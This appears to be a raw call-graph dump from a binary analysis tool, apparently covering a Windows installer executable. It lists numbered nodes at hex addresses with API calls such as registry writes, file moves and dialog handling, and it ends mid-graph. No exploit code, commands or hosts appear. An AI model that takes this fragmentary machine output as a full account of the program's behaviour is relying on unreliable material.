4520 4041a5 GetDlgItem 4529 403dc4 SendMessageW 4520->4529 4522 4041bb SendMessageW 4523 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4522->4523 4524 4041d8 GetSysColor 4522->4524 4523->4510 4524->4523 4526 404033 4525->4526 4527 404015 GlobalAlloc WideCharToMultiByte 4525->4527 4526->4497 4527->4526 4528->4520 4529->4522 4530->4514 4531 402ae4 4532 402aeb 4531->4532 4533 4030e3 4531->4533 4534 402af2 CloseHandle 4532->4534 4534->4533 4535 402065 4536 401446 18 API calls 4535->4536 4537 40206d 4536->4537 4538 401446 18 API calls 4537->4538 4539 402076 GetDlgItem 4538->4539 4540 4030dc 4539->4540 4541 4030e3 4540->4541 4543 405f7d wsprintfW 4540->4543 4543->4541 4544 402665 4545 40145c 18 API calls 4544->4545 4546 40266b 4545->4546 4547 40145c 18 API calls 4546->4547 4548 402674 4547->4548 4549 40145c 18 API calls 4548->4549 4550 40267d 4549->4550 4551 4062cf 11 API calls 4550->4551 4552 40268c 4551->4552 4553 406301 2 API calls 4552->4553 4554 402695 4553->4554 4555 4026a6 lstrlenW lstrlenW 4554->4555 4557 404f9e 25 API calls 4554->4557 4559 4030e3 4554->4559 4556 404f9e 25 API calls 4555->4556 4558 4026e8 SHFileOperationW 4556->4558 4557->4554 4558->4554 4558->4559 4560 401c69 4561 40145c 18 API calls 4560->4561 4562 401c70 4561->4562 4563 4062cf 11 API calls 4562->4563 4564 401c80 4563->4564 4565 405ccc MessageBoxIndirectW 4564->4565 4566 401a13 4565->4566 4567 402f6e 4568 402f72 4567->4568 4569 402fae 4567->4569 4571 4062cf 11 API calls 4568->4571 4570 40145c 18 API calls 4569->4570 4577 402f9d 4570->4577 4572 402f7d 4571->4572 4573 4062cf 11 API calls 4572->4573 4574 402f90 4573->4574 4575 402fa2 4574->4575 4576 402f98 4574->4576 4579 406113 9 API calls 4575->4579 4578 403ea0 5 API calls 4576->4578 4578->4577 4579->4577 4580 4023f0 4581 402403 4580->4581 4582 4024da 4580->4582 4583 40145c 18 API calls 4581->4583 4584 404f9e 25 API calls 4582->4584 4585 40240a 4583->4585 4588 4024f1 4584->4588 4586 40145c 18 API calls 4585->4586 4587 402413 4586->4587 4589 402429 LoadLibraryExW 4587->4589 4590 40241b GetModuleHandleW 4587->4590 4591 4024ce 4589->4591 4592 40243e 4589->4592 4590->4589 4590->4592 4594 404f9e 25 API calls 4591->4594 4604 406391 GlobalAlloc WideCharToMultiByte 4592->4604 4594->4582 4595 402449 4596 40248c 4595->4596 4597 40244f 4595->4597 4598 404f9e 25 API calls 4596->4598 4599 401435 25 API calls 4597->4599 4602 40245f 4597->4602 4600 402496 4598->4600 4599->4602 4601 4062cf 11 API calls 4600->4601 4601->4602 4602->4588 4603 4024c0 FreeLibrary 4602->4603 4603->4588 4605 4063c9 GlobalFree 4604->4605 4606 4063bc GetProcAddress 4604->4606 4605->4595 4606->4605 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4607 4048f8 4608 404906 4607->4608 4609 40491d 4607->4609 4610 40490c 4608->4610 4625 404986 4608->4625 4611 40492b IsWindowVisible 4609->4611 4617 404942 4609->4617 4612 403ddb SendMessageW 4610->4612 4614 404938 4611->4614 4611->4625 4615 404916 4612->4615 4613 40498c CallWindowProcW 4613->4615 4626 40487a SendMessageW 4614->4626 4617->4613 4631 406035 lstrcpynW 4617->4631 4619 404971 4632 405f7d wsprintfW 4619->4632 4621 404978 4622 40141d 80 API calls 4621->4622 4623 40497f 4622->4623 4633 406035 lstrcpynW 4623->4633 4625->4613 4627 4048d7 SendMessageW 4626->4627 4628 40489d GetMessagePos ScreenToClient SendMessageW 4626->4628 4630 4048cf 4627->4630 4629 4048d4 4628->4629 4628->4630 4629->4627 4630->4617 4631->4619 4632->4621 4633->4625 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4634 4020f9 GetDC GetDeviceCaps 4635 401446 18 API calls 4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 401c21 3851->3852 3853 401c0e 3851->3853 3854 406831 18 API calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 3880->3884 3885 40358d WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle 